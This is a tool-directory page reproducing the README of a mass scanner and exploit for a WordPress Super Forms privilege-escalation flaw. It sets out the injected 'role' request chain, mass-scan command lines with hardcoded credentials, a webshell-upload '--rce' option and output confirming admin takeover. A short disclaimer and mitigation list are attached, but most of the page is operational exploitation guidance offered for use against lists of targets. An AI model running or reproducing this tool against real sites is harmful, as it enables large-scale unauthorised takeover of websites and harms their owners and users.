Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-15989 — Mass scanner and exploit for CVE-2026-15989, the unauthenticated privilege escalation in Super Forms <= 6.3.316 that creates administrator accounts via the role parameter. | Kitploit
Tools/GitHubGitHub/fl0ydsec/cve-2026-15989
Privilege EscalationVulnerability ScannersPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationWeb SecurityPenetration Testing
GitHubfl0ydsec/cve-2026-15989

CVE-2026-15989

Mass scanner and exploit for CVE-2026-15989, the unauthenticated privilege escalation in Super Forms <= 6.3.316 that creates administrator accounts via the role parameter.

6h 10m agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository

CVE-2026-15989 — Super Forms ≤ 6.3.316 — Unauthenticated Privilege Escalation PoC

Super Forms – Drag & Drop Form Builder (WordPress) ≤ 6.3.316 — unauthenticated privilege escalation via the role parameter of the premium Register & Login add-on.

CVE-2026-15989 CVSS WordPress Auth

Author Python Telegram


📋 Vulnerability Overview

AttributeDetails
CVE IDCVE-2026-15989
Chainregistration form → 'role' in $other_userdata → wp_insert_user(role=administrator) → ADMIN
Severity🔴 CRITICAL (CVSS 9.8)
TargetSuper Forms – Drag & Drop Form Builder + premium Register & Login add-on
Affected≤ 6.3.316 (core) — vulnerable add-on builds (v1.x)
Fixed6.3.317
Authentication RequiredNone

🔍 Technical Description

The add-on sets the new user's role from the form settings ($userdata['role'] = $settings['register_user_role']), then loops over $other_userdata — which contains 'role' — and overwrites any key with the client-supplied value ($data['role']['value']) before calling wp_insert_user().

POST /wp-admin/admin-ajax.php  (unauthenticated)
        │
        ▼
action=super_submit_form + data={"role":{"value":"administrator"}, ...}
        │
        ▼
$other_userdata loop ─► $userdata['role'] = $data['role']['value']
        │
        ▼
wp_insert_user() ─► administrator account created
        │
        ▼
register_login_activation='login'/'auto' ─► wp_set_auth_cookie ─► admin session

Fix (6.3.317): 'role' removed from the whitelist + get_safe_public_registration_role() (fail-closed).

Original research — dual submit protocol: the core changed protocols at v5.0.0.

CoreActionData formatNonce
4.xsuper_send_emailnested fields (data[role][value]=...)none (checks commented out)
5.x/6.xsuper_submit_formJSON stringsf_nonce via super_create_nonce

The tool picks the protocol automatically from the detected version.


🚀 Usage

# mass scan + exploit
python CVE-2026-15989.py --list targets.txt --threads 10 --force --only-hits --results hits.txt --user Floydroot --password 'Floyd@2026!root'
python CVE-2026-15989.py --list targets.txt --threads 15 --timeout 6 --force --quiet --results hits.txt --user U --password P --no-dedup

# single target
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --email EMAIL --insecure
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --login --rce --insecure

# re-check an existing account without re-registering
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --only-login --insecure
OptionDescription
--list FILEOne target per line; URL|form_id or URL|form_id=ID,email=X per line
-u/--target, --portSingle target
--threads, --timeout, --no-dedupMass mode tuning
--forceFire the payload even without a detected registration form
--only-hits / --quietTrees only for confirmed hits / minimal output
--resetverify-mode completion via lost-password (operator pastes the reset link)
--only-loginSkip registration; log in and check the role via users/me
--login / --rceReal-target post-exploitation: login proof / webshell plugin upload
-k/--insecureIgnore TLS

📊 Output

│  ├─ plugin   : 6.3.316 — VULNERABLE <= 6.3.316
│  ├─ addon    : v1.8.7
│  ├─ form     : 4169 (/register/)
│  ├─ proto    : 5.x/6.x (super_submit_form, JSON, sf_nonce)
│  ├─ payload  : HTTP 200 ✓ processed
│  └─ session  : cookie ✓ · admin confirmed — Floydroot/Floyd@2026!root
└─── ✔ ADMIN CONFIRMED
  • hits.txt — confirmed targets only (ts|url|status|detail, with user/password)
  • bar with ETA + per-status counters; every phase prints the real reason on failure (WAF, crash, login-only form, wrong protocol...)

⚙️ Features

  • Dual protocol (4.x nested-data / 5+ JSON+nonce) — auto-selected by version
  • Version detection: readme.txt Stable tag + common.js?ver=; add-on probe + its own version
  • Registration form discovery: common paths + sitemap.xml/wp-sitemap.xml/sitemap_index + home links
  • Auto-fill of required fields (hidden/conditional included)
  • "already exists" → direct login proof of the existing account
  • Crash control: re-sends the form without the injected role to tell server-side issues from injection-triggered crashes
  • Authoritative admin proof via /wp-json/wp/v2/users/me?context=edit (fallback: users.php / dashboard)

📁 File Structure

├── CVE-2026-15989.py   # mass scanner + exploit
├── README.md
├── LICENSE
└── .gitignore

⚠️ Disclaimer

╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Mitigation

  1. Update Super Forms to 6.3.317 (or later) and rotate any leaked credentials
  2. Keep the Register & Login add-on updated (it has its own version cycle)
  3. Remove/disable published registration forms when they are not needed
  4. Audit wp-admin/ users for unexpected administrator accounts

👤 Author

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

Download Tool